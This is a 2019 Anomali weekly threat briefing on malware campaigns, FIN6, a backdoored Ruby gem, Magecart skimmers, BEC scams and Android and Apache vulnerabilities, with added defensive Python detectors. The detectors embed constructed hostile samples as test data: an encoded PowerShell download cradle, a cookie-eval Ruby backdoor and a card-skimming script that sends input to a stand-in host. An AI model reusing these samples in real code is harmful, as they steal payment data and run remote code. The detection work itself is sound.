April 9, 2019 - Anomali Threat Research

Weekly Threat Briefing: Cybercriminals Spoof Major Accounting and Payroll Firms in Tax Season Malware Campaigns

<div id="weekly"><p id="intro">The intelligence in this week’s iteration discusses the following threats: <strong>Backdoor, FIN6, LockerGoga, MageCart, Malicious applications, Malspam, Phishing, Ransomware, Ryuk, Trickbot,</strong> and <strong>Vulnerabilities.</strong> The IOCs related to these stories are attached to the Community Threat Briefing and can be used to check your logs for potential malicious activity.</p><div id="trending-threats"><h2 id="trendingthreats">Trending Threats</h2><p><a href="https://securityintelligence.com/cybercriminals-spoof-major-accounting-and-payroll-firms-in-tax-season-malware-campaigns/" target="_blank"><b>Cybercriminals Spoof Major Accounting and Payroll Firms in Tax Season Malware Campaigns</b></a> (<i>April 8, 2019</i>)<br/> IBM X-Force researchers have identified several tax-themed malspam campaigns that appear to target businesses, with the possibility that those businesses’ customers are affected as well. The actors behind these campaigns are distributing malspam that masquerades as accounting firms, human resource companies, and payroll organizations operating within the US. The impersonated companies include “ADP,” an HR management and services firm, and the payroll provider “Paychex.” The emails attempt to convince recipients to open a macro-embedded Microsoft Excel document. If the recipient enables macros, the heavily obfuscated macro begins the infection process for the “Trickbot” banking trojan.
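The check a mail gateway or analyst can apply to attachments like these, as an added example that is not part of the original briefing or of IBM X-Force’s research: OOXML workbooks are zip containers, so the presence of a VBA project can be established without opening Excel. The sample containers, the part names and the quarantine rule are assumptions constructed for the example; legacy binary .xls files are OLE2, not zip, and need a different parser.

```python
"""Gateway check for macro-carrying Office attachments.

Added example for this briefing; it is not IBM X-Force's or Anomali's code.
OOXML documents (.xlsx/.xlsm/.docx/.docm) are zip containers. A VBA project
is stored as a part such as xl/vbaProject.bin and is declared in
[Content_Types].xml with the content type below, so checking both the part
name and the manifest catches a macro-enabled workbook even when it has been
renamed to .xlsx or the part moved. The sample containers are built in memory.
"""
import io
import zipfile
from typing import List

VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"


def vba_parts(data: bytes) -> List[str]:
    """Return the names of VBA project parts in an OOXML container.

    Legacy OLE2 binaries (.xls/.doc) are not zip files and return [] here;
    they need an OLE parser (for example oletools) instead.
    """
    buf = io.BytesIO(data)
    if not zipfile.is_zipfile(buf):
        return []
    found: List[str] = []
    with zipfile.ZipFile(buf) as zf:
        names = zf.namelist()
        found.extend(n for n in names if n.lower().endswith("vbaproject.bin"))
        if "[Content_Types].xml" in names:
            manifest = zf.read("[Content_Types].xml").decode("utf-8", "replace")
            # Each <Override PartName="/xl/..." ContentType="..."/> declares one part.
            for element in manifest.split("<"):
                if VBA_CONTENT_TYPE in element and 'PartName="' in element:
                    part = element.split('PartName="', 1)[1].split('"', 1)[0].lstrip("/")
                    if part not in found:
                        found.append(part)
    return found


def should_quarantine(data: bytes) -> bool:
    """Mail-gateway rule (assumed policy): hold any Office attachment carrying VBA."""
    return bool(vba_parts(data))


def build_sample(with_macro: bool, part_name: str = "xl/vbaProject.bin") -> bytes:
    """Constructed minimal workbook container for testing (not a real Excel file)."""
    overrides = ['<Override PartName="/xl/workbook.xml" ContentType="application/'
                 'vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml"/>']
    if with_macro:
        overrides.append(f'<Override PartName="/{part_name}" ContentType="{VBA_CONTENT_TYPE}"/>')
    manifest = ('<?xml version="1.0" encoding="UTF-8"?><Types xmlns="http://schemas.'
                'openxmlformats.org/package/2006/content-types">' + "".join(overrides) + "</Types>")
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", manifest)
        zf.writestr("xl/workbook.xml", "<workbook/>")
        if with_macro:
            zf.writestr(part_name, b"placeholder bytes standing in for a compiled VBA project")
    return out.getvalue()


if __name__ == "__main__":
    for label, blob in (("clean", build_sample(False)), ("macro", build_sample(True))):
        print(label, vba_parts(blob), "quarantine" if should_quarantine(blob) else "deliver")
```

The manifest check is what matters in practice: an attacker who renames the VBA part still has to declare its content type for Office to load it, so the part name alone is the weaker of the two signals.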
Trickbot attempts to steal as much data as possible, primarily banking credentials, before sending the information to a Command and Control (C2) server.<br/> <a href="https://forum.anomali.com/t/cybercriminals-spoof-major-accounting-and-payroll-firms-in-tax-season-malware-campaigns/3710" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947205">[MITRE ATT&amp;CK] User Execution (T1204)</a> | <a href="https://ui.threatstream.com/ttp/947180">[MITRE ATT&amp;CK] Spearphishing Attachment (T1193)</a></p><p><a href="https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html" target="_blank"><b>Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware</b></a> (<i>April 5, 2019</i>)<br/> FireEye researchers responded to an incident and found that the activity was conducted by the financially-motivated threat group “FIN6.” Researchers found that the group compromised an internet-facing system of its unnamed target and then moved laterally inside the network using stolen credentials over Windows’ Remote Desktop Protocol (RDP). FIN6 used two techniques to maintain persistence. The first was PowerShell executing an encoded command that turned out to be a “Cobalt Strike” HTTPS stager, which would then download a second shellcode payload configured to download a third, unknown payload. The second was the creation of a Windows service to execute encoded PowerShell commands that contained “Metasploit” reverse HTTP shellcode. The objective of the campaign was to use the compromised servers to distribute malware and host tools. The staged malware was found to be the “LockerGoga” and “Ryuk” ransomware families.
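Both persistence techniques above leave encoded PowerShell in the logs: in the command line of a process-creation event (Windows 4688 or Sysmon 1) and in the ImagePath recorded by a 7045 “service installed” event. As an added example, not FireEye’s or Anomali’s code, the following recovers the -EncodedCommand payload from such records and scores it; the event records, the placeholder scripts inside them and the indicator list are constructed for the example.

```python
"""Decode -EncodedCommand PowerShell from process-creation and service-install logs.

Added example for this briefing; not FireEye's or Anomali's code. PowerShell's
-EncodedCommand (also accepted as -e, -ec, -enc, ...) is Base64 over UTF-16LE,
so the script is trivial to recover from a 4688/Sysmon command line and from
the ImagePath of a 7045 event. The sample events below are constructed; the
scripts inside them are harmless placeholders that mimic the download-cradle
and in-memory-loader shapes described in the story.
"""
import base64
import re
from typing import Dict, List, Optional

ENC_RE = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)
INDICATORS = [
    "IEX", "Invoke-Expression", "DownloadString", "DownloadFile", "Net.WebClient",
    "FromBase64String", "GzipStream", "MemoryStream", "Reflection.Assembly", "VirtualAlloc",
]


def encode_ps(script: str) -> str:
    """Encode a script the way PowerShell expects it for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries an encoded command."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    b64 = m.group(1)
    b64 += "=" * (-len(b64) % 4)          # tolerate padding lost to log truncation
    raw = base64.b64decode(b64, validate=False)
    return raw.decode("utf-16le", errors="replace")


def triage(event: Dict) -> Optional[Dict]:
    """Decode one event and score it; a service whose ImagePath is encoded PowerShell is always high."""
    script = decode_encoded_command(event["command_line"])
    if script is None:
        return None
    hits = [i for i in INDICATORS if i.lower() in script.lower()]
    severity = "high" if hits or event["event_id"] == 7045 else "review"
    return {"event_id": event["event_id"], "decoded": script, "indicators": hits, "severity": severity}


def hunt(events: List[Dict]) -> List[Dict]:
    """Run triage over a batch of events and keep only those carrying encoded PowerShell."""
    return [t for t in (triage(e) for e in events) if t]


# Constructed sample records (event_id 4688 = process creation, 7045 = service installed).
SAMPLE_EVENTS = [
    {"event_id": 4688,
     "command_line": "powershell.exe -nop -w hidden -enc "
                     + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')")},
    {"event_id": 7045,
     "command_line": "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -encodedcommand "
                     + encode_ps("$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('AAAA'));"
                                 "IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream("
                                 "$s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()")},
    {"event_id": 4688, "command_line": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f["event_id"], f["severity"], f["indicators"])
        print("   ", f["decoded"][:80])
```

Decoding is the whole point: an indicator match on the raw command line never fires, because the cradle is hidden inside the Base64. Note that a legitimate -EncodedCommand with no indicator hits is still reported as “review” rather than dropped, since a stager that does nothing but download a second stage may contain none of the strings above.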
Using ransomware is a change of tactics for FIN6, which has primarily targeted point-of-sale terminals.<br/> <a href="https://forum.anomali.com/t/pick-six-intercepting-a-fin6-intrusion-an-actor-recently-tied-to-ryuk-and-lockergoga-ransomware/3711" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947156">[MITRE ATT&amp;CK] Remote Desktop Protocol (T1076)</a> | <a href="https://ui.threatstream.com/ttp/947231">[MITRE ATT&amp;CK] Valid Accounts (T1078)</a> | <a href="https://ui.threatstream.com/ttp/947287">[MITRE ATT&amp;CK] PowerShell (T1086)</a> | <a href="https://ui.threatstream.com/ttp/947224">[MITRE ATT&amp;CK] Exfiltration Over Alternative Protocol (T1048)</a></p><p><a href="https://www.zdnet.com/article/backdoor-code-found-in-popular-bootstrap-sass-ruby-library/" target="_blank"><b>Backdoor Code Found in Popular Bootstrap-Sass Ruby Library</b></a> (<i>April 5, 2019</i>)<br/> Software developer Derek Barnes discovered a backdoor in “bootstrap-sass,” a widely used Ruby library (gem) that packages the Bootstrap front-end framework for Rails applications. Barnes noticed the issue when version 3.2.0.2 was removed from the Ruby library repository “RubyGems” and replaced with a new version (3.2.0.3) that was published to RubyGems only and never appeared in the project’s GitHub repository. The added code, which runs inside applications built on the “Ruby on Rails” framework, would read a cookie from incoming requests and execute its content; this behaviour was confirmed by a security researcher from Bad Packets.
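Two checks a Rails team could run on the back of this story, as an added example that is not code from the bootstrap-sass project, Derek Barnes, Bad Packets or Anomali: audit the Gemfile.lock for the pulled release, and scan vendored gem source for eval-style calls sitting next to request-derived input, which is the shape of behaviour the story describes. The lockfile, the Ruby snippet and its `hint` cookie name are constructed for the example and are not the real backdoor.

```python
"""Audit a Ruby app for the pulled bootstrap-sass release and for eval-on-request-input
patterns in vendored gem source.

Added example for this briefing; not code from the bootstrap-sass project, Derek Barnes
or Anomali. The only pinned fact is the version named in the story: 3.2.0.3 was pulled
from RubyGems and 3.2.0.4 replaced it. The Ruby snippet scanned below is constructed to
mirror the described behaviour (read a cookie, execute its content).
"""
import re
from typing import Dict, List

KNOWN_BAD = {("bootstrap-sass", "3.2.0.3")}
SPEC_RE = re.compile(r"^    ([A-Za-z0-9_.\-]+) \(([^)]+)\)$")   # 4-space indent = a resolved spec
EVAL_RE = re.compile(r"\b(?:eval|instance_eval|class_eval|module_eval)\s*\(?|Kernel\.send\(\s*:eval")
INPUT_RE = re.compile(r"HTTP_COOKIE|\bcookies\[|Base64\.decode64|\bparams\[|\benv\[", re.I)


def parse_lock_specs(lock_text: str) -> Dict[str, str]:
    """Return {gem: version} from every specs: block of a Gemfile.lock."""
    specs: Dict[str, str] = {}
    in_specs = False
    for line in lock_text.splitlines():
        if line.strip() == "specs:":
            in_specs = True
            continue
        if line and not line.startswith(" "):   # GEM / PLATFORMS / DEPENDENCIES header
            in_specs = False
        if in_specs:
            m = SPEC_RE.match(line)
            if m:
                specs[m.group(1)] = m.group(2)
    return specs


def audit_lock(lock_text: str) -> List[str]:
    """Gems resolved to a release known to be malicious."""
    return [f"{g} {v}" for g, v in parse_lock_specs(lock_text).items() if (g, v) in KNOWN_BAD]


def suspicious_eval_lines(source: str, window: int = 3) -> List[int]:
    """1-based line numbers where an eval-style call sits within `window` lines of
    request-derived input (cookies, params, the Rack env, Base64 decoding)."""
    lines = source.splitlines()
    hits: List[int] = []
    for i, line in enumerate(lines):
        if EVAL_RE.search(line):
            lo, hi = max(0, i - window), min(len(lines), i + window + 1)
            if any(INPUT_RE.search(nearby) for nearby in lines[lo:hi]):
                hits.append(i + 1)
    return hits


# Constructed lockfile: an app that resolved the pulled release.
SAMPLE_LOCK = """GEM
  remote: https://rubygems.org/
  specs:
    bootstrap-sass (3.2.0.3)
      autoprefixer-rails (>= 5.2.1)
      sass (>= 3.3.4)
    sass (3.7.4)

PLATFORMS
  ruby

DEPENDENCIES
  bootstrap-sass (~> 3.2.0)
"""

# Constructed Rack middleware that executes whatever a cookie carries (illustrative only).
SAMPLE_SOURCE = """require 'base64'
class CookieHook
  def initialize(app); @app = app; end
  def call(env)
    payload = env['HTTP_COOKIE'].to_s[/hint=([^;]+)/, 1]
    eval(Base64.decode64(payload)) unless payload.nil?
    @app.call(env)
  end
end
"""

if __name__ == "__main__":
    print("bad gems:", audit_lock(SAMPLE_LOCK))
    print("eval near request input at lines:", suspicious_eval_lines(SAMPLE_SOURCE))
```

The lockfile check is exact but only catches what is already known; the source scan is a heuristic for the class of backdoor (request data fed to an evaluator) and will need its hits reviewed by hand. The structural lesson of the story, a registry artifact that differs from the tagged source, is best caught by diffing the unpacked gem against the matching GitHub tag in CI.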
On April 4, 2019, bootstrap-sass version 3.2.0.4, with the malicious code removed, was released on both RubyGems and GitHub.<br/> <a href="https://forum.anomali.com/t/backdoor-code-found-in-popular-bootstrap-sass-ruby-library/3712" target="_blank">Click here for Anomali recommendation</a></p><p><a href="https://www.agari.com/email-security-blog/london-blue-evolving-tactics/" target="_blank"><b>BEC Scam Gang London Blue Evolves Tactics, Targets</b></a> (<i>April 4, 2019</i>)<br/> The threat group “London Blue,” known primarily for conducting Business Email Compromise (BEC) attacks, has been conducting a new campaign since January 2019, according to Agari researchers. London Blue is a Nigerian group that has been active since at least 2011 and has members in the U.S., the U.K., and elsewhere around the world; members not located in Nigeria are primarily involved in moving stolen funds into actor-controlled accounts. Agari researchers identified the new campaign via an email sent to the company’s own Chief Financial Officer (CFO). The campaign comes in multiple parts. The initial email claims that a correspondent of the recipient forwarded the sender an email, and asks the recipient to let the sender know if anything else is needed. The follow-up email claims that the sender needs the recipient’s help with an acquisition and that a down payment of $86,000 USD via wire transfer is required to complete it.
The email claims that the acquisition has yet to be made public and therefore asks the recipient not to discuss it with anyone else in the office.<br/> <a href="https://forum.anomali.com/t/bec-scam-gang-london-blue-evolves-tactics-targets/3713" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947205">[MITRE ATT&amp;CK] User Execution (T1204)</a></p><p><a href="https://www.bleepingcomputer.com/news/security/dozens-of-credit-card-info-skimming-scripts-infect-thousands-of-sites/" target="_blank"><b>Dozens of Credit Card Info Skimming Scripts Infect Thousands of Sites</b></a> (<i>April 3, 2019</i>)<br/> The threat groups that target website checkout pages with credit and debit card skimming scripts, referred to collectively as Magecart, have deployed new skimmers that had not been analyzed before, according to Group-IB researchers. RiskIQ researchers first reported on Magecart activity and the 12 groups that comprise it; Group-IB researchers have since catalogued approximately 38 different families of skimming scripts, which they call “JS-Sniffers,” and analyzed 15 of them in detail. In total, approximately 2,440 websites were found to be infected with a JS-Sniffer skimmer.
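Because the skimmer lands on the checkout page as a script, an inventory of that page’s scripts is the defender’s first control. As an added example, not Group-IB’s, RiskIQ’s or Anomali’s code, the following flags the three shapes a JS-Sniffer deployment takes on the page (a script from an origin not on the allowlist, a third-party script without Subresource Integrity, and an inline script that both reads form inputs and sends them off-page). The allowlist, the hostnames, the integrity value and the sample page are assumptions constructed for the example.

```python
"""Inventory the scripts on a checkout page and flag what a skimmer deployment looks like.

Added example for this briefing; not Group-IB's, RiskIQ's or Anomali's code. The three
checks line up with the injection routes the story lists: an unexpected script origin
(supply-chain or compromised CDN), a third-party script with no Subresource Integrity
(a silently modified file), and an inline script that harvests inputs and sends them
off-page (direct injection into the page). ALLOWED_ORIGINS and the page are assumptions.
"""
from html.parser import HTMLParser
from typing import Dict, List, Set
from urllib.parse import urlparse

ALLOWED_ORIGINS: Set[str] = {"shop.example", "cdn.example"}   # assumed first-party and CDN hosts
HARVEST = ("queryselectorall('input'", "cardnumber", "cvv", "cvc", "expir")
EXFIL = ("xmlhttprequest", "fetch(", "sendbeacon", "new image", "websocket", ".src=")


class ScriptInventory(HTMLParser):
    """Collect every <script> with its src, integrity attribute and inline body."""

    def __init__(self) -> None:
        super().__init__()
        self.scripts: List[Dict] = []
        self._current: Dict = {}
        self._buf: List[str] = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            a = dict(attrs)
            self._current = {"src": a.get("src"), "integrity": a.get("integrity"), "body": ""}
            self._buf, self._in_script = [], True

    def handle_data(self, data):
        if self._in_script:            # html.parser hands script bodies over as raw data
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._current["body"] = "".join(self._buf)
            self.scripts.append(self._current)
            self._in_script = False


def audit_checkout_page(html: str, page_url: str, allowed: Set[str] = ALLOWED_ORIGINS) -> List[str]:
    """Return one finding per script that does not look like the page's own, vetted code."""
    parser = ScriptInventory()
    parser.feed(html)
    parser.close()
    page_host = urlparse(page_url).hostname
    findings: List[str] = []
    for s in parser.scripts:
        if s["src"]:
            host = urlparse(s["src"]).hostname or page_host    # relative src = same origin
            if host not in allowed:
                findings.append(f"unexpected script origin: {s['src']}")
            elif host != page_host and not s["integrity"]:
                findings.append(f"third-party script without SRI: {s['src']}")
        else:
            body = s["body"].lower()
            if any(h in body for h in HARVEST) and any(e in body for e in EXFIL):
                findings.append("inline script reads form inputs and sends them off-page")
    return findings


# Constructed checkout page: one clean first-party script, one pinned CDN script,
# one unpinned CDN script, one script from an unknown host, and one inline harvester.
SAMPLE_CHECKOUT = """<html><head>
<script src="/js/checkout.js"></script>
<script src="https://cdn.example/lib.js" integrity="sha384-placeholder"></script>
<script src="https://cdn.example/unpinned.js"></script>
<script src="https://stats.example.net/t.js"></script>
<script>
document.querySelector('form').addEventListener('submit', function () {
  var d = {};
  document.querySelectorAll('input').forEach(function (i) { d[i.name] = i.value; });
  new Image().src = 'https://stats.example.net/p?d=' + btoa(JSON.stringify(d));
});
</script>
</head><body><form><input name="cardnumber"><input name="cvv"></form></body></html>"""

if __name__ == "__main__":
    for finding in audit_checkout_page(SAMPLE_CHECKOUT, "https://shop.example/checkout"):
        print(finding)
```

Run against a fetched copy of the live checkout page on a schedule and diff the inventory against the last known-good run; a Content-Security-Policy with an explicit `script-src` allowlist turns the same origin check into an enforced browser-side control.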
Threat actors likely compromise a website to install the skimmer by exploiting a known vulnerability, by using stolen credentials, or through a supply chain attack (compromising a third-party script the site loads).<br/> <a href="https://forum.anomali.com/t/dozens-of-credit-card-info-skimming-scripts-infect-thousands-of-sites/3714" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947201">[MITRE ATT&amp;CK] Scripting (T1064)</a> | <a href="https://ui.threatstream.com/ttp/1260019">[MITRE PRE-ATT&amp;CK] Research relevant vulnerabilities/CVEs (PRE-T1068)</a></p><p><a href="https://www.upguard.com/breaches/facebook-user-data-leak" target="_blank"><b>Losing Face: Two More Cases of Third-Party Facebook App Data Exposure</b></a> (<i>April 3, 2019</i>)<br/> The UpGuard Cyber Risk team has published its findings on two third-party Facebook application datasets that were publicly accessible on the internet. One of the datasets was found to originate from the Mexico-based media company “Cultura Colectiva” and consisted of 146 gigabytes of data containing more than 540 million Facebook records. The records contained information such as account names, comments, Facebook IDs, and likes, among others.
Researchers also identified a separate backup from a different Facebook-integrated application, “At the Pool,” stored in a publicly accessible Amazon S3 bucket. The bucket for the At the Pool application contained data labeled fb_books, fb_checkins, fb_events, fb_friends, fb_groups, fb_interests, fb_likes, fb_movies, fb_music, fb_photos, and password, among others.<br/> <a href="https://forum.anomali.com/t/losing-face-two-more-cases-of-third-party-facebook-app-data-exposure/3715" target="_blank">Click here for Anomali recommendation</a></p><p><a href="https://www.alienvault.com/blogs/labs-research/xwo-a-python-based-bot-scanner" target="_blank"><b>Xwo – A Python-Based Bot Scanner</b></a> (<i>April 2, 2019</i>)<br/> A new malware family, dubbed “Xwo,” is being distributed by threat actors as a file called “xwo.exe” from a Command and Control (C2) server. Xwo is a Python-based scanner that checks exposed services for default or missing credentials and reports what it finds back to a C2 server. The malware shares code and infrastructure with the “MongoLock” ransomware, although Xwo itself has no ransomware or exploit capabilities. Once Xwo has infected a machine, it sends an HTTP POST request using a User-Agent picked from a hardcoded list and then receives instructions from a C2 domain containing an encoded public network range to scan. Xwo gathers data such as SVN and Git paths, PhpMyAdmin details, and the use of default credentials for FTP, Memcached, MongoDB, MySQL, PostgreSQL, and Redis, among other data.
Researchers believe that, while this malware has no destructive features such as ransomware or exploit capabilities, the actors behind Xwo will use the information it gathers in a future operation.<br/> <a href="https://forum.anomali.com/t/xwo-a-python-based-bot-scanner/3716" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947205">[MITRE ATT&amp;CK] User Execution (T1204)</a> | <a href="https://ui.threatstream.com/ttp/947125">[MITRE ATT&amp;CK] System Information Discovery (T1082)</a> | <a href="https://ui.threatstream.com/ttp/947276">[MITRE ATT&amp;CK] Network Service Scanning (T1046)</a> | <a href="https://ui.threatstream.com/ttp/947289">[MITRE ATT&amp;CK] Custom Command and Control Protocol (T1094)</a></p><p><a href="https://www.theregister.co.uk/2019/04/02/april_android_security/" target="_blank"><b>Don’t be an April Fool: Update Your Android Mobes, Gizmos to – Hopefully – Pick up Critical Security Fixes</b></a> (<i>April 2, 2019</i>)<br/> Google has released its April Android security bulletin in two patch batches, addressing 11 CVE-registered vulnerabilities and a further 44 flaws. Two of the 11 CVEs, “CVE-2019-2027” and “CVE-2019-2028,” are Remote Code Execution (RCE) vulnerabilities in the media framework that could be exploited by convincing a user to open a malicious message or video. Of the other nine CVEs, one is a privilege-escalation vulnerability in the framework that could be exploited by an installed application, and eight are located in the Android system: five further privilege-escalation flaws and three that expose information.
The nine vulnerabilities are all rated as “high severity.”<br/> <a href="https://forum.anomali.com/t/don-t-be-an-april-fool-update-your-android-mobes-gizmos-to-hopefully-pick-up-critical-security-fixes/3717" target="_blank">Click here for Anomali recommendation</a></p><p><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/" target="_blank"><b>New Version of XLoader That Disguises as Android Apps and an iOS Profile Holds New Links to FakeSpy</b></a> (<i>April 2, 2019</i>)<br/> A new variant of the “XLoader” spyware has been discovered impersonating a security application for Android devices and using a malicious iOS configuration profile to target iPhones and iPads, according to Trend Micro researchers. This variant, called XLoader version 6.0, is distributed through SMS messages (smishing) containing a link to a fake Android security application. The actors behind this campaign are hosting the malware on several fake websites, one of which impersonates a legitimate Japanese mobile operator’s website. Following a link to an actor-controlled website prompts the visitor to download the malicious Android application package (APK). For iOS users, the initial website redirects to another that prompts the user to “install a malicious iOS configuration profile to solve a network issue preventing the site from loading.” Installation of the profile opens a fake website masquerading as an Apple ID sign-in page.
XLoader is capable of stealing various forms of data from an infected device and uses social media profiles on Twitter to conceal its Command and Control (C2) server addresses.<br/> <a href="https://forum.anomali.com/t/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/3718" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947263">[MITRE ATT&amp;CK] Spearphishing via Service (T1194)</a> | <a href="https://ui.threatstream.com/ttp/947205">[MITRE ATT&amp;CK] User Execution (T1204)</a> | <a href="https://ui.threatstream.com/ttp/947289">[MITRE ATT&amp;CK] Custom Command and Control Protocol (T1094)</a></p><p><a href="https://www.bleepingcomputer.com/news/security/apache-bug-lets-normal-users-gain-root-access-via-scripts/" target="_blank"><b>Apache Bug Lets Normal Users Gain Root Access Via Scripts</b></a> (<i>April 2, 2019</i>)<br/> Mark J. Cox, a founding member of the Apache Software Foundation and the OpenSSL project, posted on Twitter the details of a vulnerability, registered as “CVE-2019-0211,” that affects Apache HTTP Server versions 2.4.17 to 2.4.38 on Unix systems. The vulnerability allows code running in a less-privileged child process or thread, including scripts executed by an in-process scripting interpreter (for example PHP run via mod_php on a shared hosting server), to execute arbitrary code with the privileges of the parent process, which is usually root, by manipulating the shared-memory scoreboard. This vulnerability, together with two others registered as “CVE-2019-0217” and “CVE-2019-0215,” was patched in Apache HTTP Server version 2.4.39.
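A quick triage of the version ranges in this story, as an added example that is not Apache’s or Anomali’s code: it parses the version from `httpd -v` output or a Server header and reports which of the three CVEs apply. The ranges are the ones stated here (all fixed in 2.4.39); the banner strings are constructed, and a server configured with `ServerTokens Prod` discloses no version at all, so the number should be taken from the host.

```python
"""Map an Apache httpd version to the three CVEs in the story.

Added example for this briefing; not Apache's or Anomali's code. The affected ranges
are the ones the story states, all fixed in 2.4.39. The version usually has to come
from `httpd -v` on the host: with ServerTokens Prod the Server header says only
"Apache", which this parser reports as undisclosed rather than as safe.
"""
import re
from typing import List, Optional, Tuple

Version = Tuple[int, int, int]
FIXED: Version = (2, 4, 39)
ADVISORIES = [
    ("CVE-2019-0211", (2, 4, 17), (2, 4, 38),
     "script in a worker process gains parent (usually root) privileges via the scoreboard"),
    ("CVE-2019-0217", (2, 4, 0), (2, 4, 38),
     "mod_auth_digest race: a valid user can authenticate as another username"),
    ("CVE-2019-0215", (2, 4, 37), (2, 4, 38),
     "mod_ssl TLS 1.3 post-handshake auth bypasses per-location client-cert checks"),
]


def parse_httpd_version(text: str) -> Optional[Version]:
    """Parse 'Server version: Apache/2.4.38 (Unix)' (httpd -v) or 'Server: Apache/2.4.38'."""
    m = re.search(r"Apache/(\d+)\.(\d+)\.(\d+)", text)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3))) if m else None


def applicable_cves(version: Version) -> List[str]:
    """CVE IDs from the story whose stated affected range includes this version."""
    return [cve for cve, low, high, _ in ADVISORIES if low <= version <= high]


def fmt(version: Version) -> str:
    return ".".join(str(part) for part in version)


def assess(text: str) -> str:
    """One-line verdict for a banner or `httpd -v` line."""
    v = parse_httpd_version(text)
    if v is None:
        return "version not disclosed; run `httpd -v` on the host"
    if v < (2, 4, 0):
        return f"{fmt(v)}: 2.2 branch is end-of-life and not covered by these advisories"
    cves = applicable_cves(v)
    if not cves:
        return f"{fmt(v)}: none of the listed CVEs apply"
    return f"{fmt(v)}: {', '.join(cves)}; upgrade to {fmt(FIXED)}"


if __name__ == "__main__":
    for banner in ("Server version: Apache/2.4.38 (Unix)", "Server: Apache/2.4.10", "Server: Apache"):
        print(f"{banner!r} -> {assess(banner)}")
```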
CVE-2019-0217 affects versions 2.4.0 through 2.4.38 and is a race condition in mod_auth_digest that could allow a user “with valid credentials to authenticate using another username, bypassing configured access control restrictions.” CVE-2019-0215 affects Apache 2.4.37 and 2.4.38 installations using TLS 1.3 with per-location client certificate verification and allows a “client supporting Post-Handshake Authentication to bypass configured access control restrictions.” Three less-severe vulnerabilities were also addressed in Apache HTTP Server version 2.4.39: a read-after-free and a crash in mod_http2, and an inconsistency in URL normalization.<br/> <a href="https://forum.anomali.com/t/apache-bug-lets-normal-users-gain-root-access-via-scripts/3719" target="_blank">Click here for Anomali recommendation</a></p><p><a href="https://nakedsecurity.sophos.com/2019/04/02/government-spyware-hidden-in-google-play-store-apps/" target="_blank"><b>Government Spyware Hidden in Google Play Store Apps</b></a> (<i>April 2, 2019</i>)<br/> Security researchers have discovered applications in the Google Play store that contain spyware, according to Motherboard reporters. Motherboard believes that the malware is linked to the Italian government, which reportedly purchased it from a surveillance company called “eSurv.” Security Without Borders researchers state that the malware, dubbed “Exodus,” had never been previously identified; they attribute it to eSurv on the basis of an Italian dialect word and the name of the retired footballer “RINO GATTUSO” found in the code, both of which point to the region where eSurv is based. Exodus works in two stages. The first stage is the malware masquerading as an application that receives “promotions and marketing offers from local Italian cell phone providers or that claim to improve the device’s performance.” The first stage then loads the second stage, which is responsible for collecting data and sending it back to a Command and Control (C2) server.
Exodus is capable of gathering application passwords, browsing history, contact lists from other applications, text messages, and Wi-Fi passwords.<br/> <a href="https://forum.anomali.com/t/government-spyware-hidden-in-google-play-store-apps/3720" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/1260060">[MITRE MOBILE-ATT&amp;CK] Application Discovery (MOB-T1021)</a> | <a href="https://ui.threatstream.com/ttp/1260082">[MITRE MOBILE-ATT&amp;CK] File and Directory Discovery (MOB-T1023)</a> | <a href="https://ui.threatstream.com/ttp/1260119">[MITRE MOBILE-ATT&amp;CK] System Information Discovery (MOB-T1029)</a></p><p><a href="https://threatpost.com/google-warns-of-growing-android-attack-vector-backdoored-sdks-and-pre-installed-apps/143332/" target="_blank"><b>Google Warns of Growing Android Attack Vector: Backdoored SDKs and Pre-Installed Apps</b></a> (<i>April 1, 2019</i>)<br/> Google has released its “Android Security and Privacy Year in Review 2018,” in which the company explains that it has observed an increase in threat actors attempting to install Potentially Harmful Applications (PHAs) through the supply chain and pre-installed applications. Actors are also targeting Over The Air (OTA) updates “that bundle legitimate system updates with PHAs.” These vectors are appealing from a threat actor’s point of view because they reach applications that come pre-installed on Android devices, which leaves a user exposed to malicious activity associated with an application the user never chose to install.
